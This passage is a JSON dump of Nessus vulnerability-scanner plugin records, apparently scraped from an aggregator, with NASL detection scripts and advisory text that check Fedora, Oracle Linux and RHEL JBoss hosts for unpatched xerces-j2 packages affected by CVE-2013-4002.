make_list(\"11.0.0-11.6.1\",\"10.0.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.3.0-11.6.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.0.0\",\"11.6.1HF1\",\"11.5.4HF2\");\n\n\nif 
(bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_hole(port:0, extra:bigip_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T07:03:51", "bulletinFamily": "scanner", "description": "Security fix for CVE-2013-4002\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "FEDORA_2014-10649.NASL", "href": "https://www.tenable.com/plugins/nessus/77868", "published": "2014-09-26T00:00:00", "title": "Fedora 19 : xerces-j2-2.11.0-15.fc19 (2014-10649)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-10649.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77868);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:06:07 $\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_bugtraq_id(61310);\n script_xref(name:\"FEDORA\", value:\"2014-10649\");\n\n script_name(english:\"Fedora 19 : xerces-j2-2.11.0-15.fc19 (2014-10649)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2013-4002\n\nNote that Tenable Network Security has extracted the 
preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1019176\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138577.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5036fed9\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xerces-j2 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || 
\"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"xerces-j2-2.11.0-15.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-j2\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T08:41:23", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2014:1319 :\n\nUpdated xerces-j2 packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nApache Xerces for Java (Xerces-J) is a high performance, standards\ncompliant, validating XML parser written in Java. The xerces-j2\npackages provide Xerces-J version 2.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. 
A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. (CVE-2013-4002)\n\nAll xerces-j2 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. Applications\nusing the Xerces-J must be restarted for this update to take effect.", "modified": "2019-12-02T00:00:00", "id": "ORACLELINUX_ELSA-2014-1319.NASL", "href": "https://www.tenable.com/plugins/nessus/77978", "published": "2014-09-30T00:00:00", "title": "Oracle Linux 6 / 7 : xerces-j2 (ELSA-2014-1319)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:1319 and \n# Oracle Linux Security Advisory ELSA-2014-1319 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(77978);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/09/30 10:58:19\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_bugtraq_id(61310);\n script_xref(name:\"RHSA\", value:\"2014:1319\");\n\n script_name(english:\"Oracle Linux 6 / 7 : xerces-j2 (ELSA-2014-1319)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2014:1319 :\n\nUpdated xerces-j2 packages that fix one security issue are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nApache Xerces for Java (Xerces-J) is a high performance, standards\ncompliant, validating XML parser written in Java. The xerces-j2\npackages provide Xerces-J version 2.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. (CVE-2013-4002)\n\nAll xerces-j2 users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. Applications\nusing the Xerces-J must be restarted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004494.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004495.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected xerces-j2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2-javadoc\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:xerces-j2-javadoc-apis\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2-javadoc-impl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2-javadoc-other\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2-javadoc-xni\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:xerces-j2-scripts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"xerces-j2-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xerces-j2-demo-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xerces-j2-javadoc-apis-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xerces-j2-javadoc-impl-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xerces-j2-javadoc-other-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"xerces-j2-javadoc-xni-2.7.1-12.7.el6_5\")) flag++;\nif (rpm_check(release:\"EL6\", 
reference:\"xerces-j2-scripts-2.7.1-12.7.el6_5\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"xerces-j2-2.11.0-17.el7_0\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"xerces-j2-demo-2.11.0-17.el7_0\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"xerces-j2-javadoc-2.11.0-17.el7_0\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xerces-j2 / xerces-j2-demo / xerces-j2-javadoc / etc\");\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T08:53:48", "bulletinFamily": "scanner", "description": "Updated packages that provide Red Hat JBoss Enterprise Application\nPlatform 6.3.2 and fix one security issue, several bugs, and add\nvarious enhancements are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. (CVE-2013-4002)\n\nThis release of JBoss Enterprise Application Platform also includes\nbug fixes and enhancements. 
A list of these changes is available from\nthe JBoss Enterprise Application Platform 6.3.2 Downloads page on the\nCustomer Portal.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red\nHat Enterprise Linux 6 are advised to upgrade to these updated\npackages. The JBoss server process must be restarted for the update to\ntake effect.", "modified": "2019-12-02T00:00:00", "id": "REDHAT-RHSA-2014-1818.NASL", "href": "https://www.tenable.com/plugins/nessus/79115", "published": "2014-11-11T00:00:00", "title": "RHEL 6 : JBoss EAP (RHSA-2014:1818)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1818. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79115);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2013-4002\");\n script_xref(name:\"RHSA\", value:\"2014:1818\");\n\n script_name(english:\"RHEL 6 : JBoss EAP (RHSA-2014:1818)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated packages that provide Red Hat JBoss Enterprise Application\nPlatform 6.3.2 and fix one security issue, several bugs, and add\nvarious enhancements are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a\nspecially crafted declaration using a long pseudo-attribute name that,\nwhen parsed by an application using Xerces-J, would cause that\napplication to use an excessive amount of CPU. (CVE-2013-4002)\n\nThis release of JBoss Enterprise Application Platform also includes\nbug fixes and enhancements. A list of these changes is available from\nthe JBoss Enterprise Application Platform 6.3.2 Downloads page on the\nCustomer Portal.\n\nAll users of Red Hat JBoss Enterprise Application Platform 6.3 on Red\nHat Enterprise Linux 6 are advised to upgrade to these updated\npackages. The JBoss server process must be restarted for the update to\ntake effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:1818\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-4002\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:apache-cxf-xjc-utils\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cxf-xjc-boolean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cxf-xjc-dv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:cxf-xjc-ts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-infinispan-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-impl-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-spi-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-impl-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-deployers-common-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-jdbc-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-spec-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-validator-eap6\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:javassist-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-client-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-clustering\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-connector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-core-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-repository\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-scanner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-http\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-management\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee-deployment\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ejb3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-host-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jacorb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jdr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jpa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsr77\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-logging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-management-client-content\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-modcluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-service\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-picketlink\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-platform-mbean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-process-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-protocol\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-sar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-system-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-threads\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-version\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-webservices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-weld\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-xts\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-hal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-logmanager\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-metadata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-metadata-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-metadata-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-metadata-ear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-metadata-ejb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-metadata-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-remoting3-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-xnio-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-javadocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-modules-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-product-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-standalone\");\n script_set_attribute(attribute:\"cpe\", 
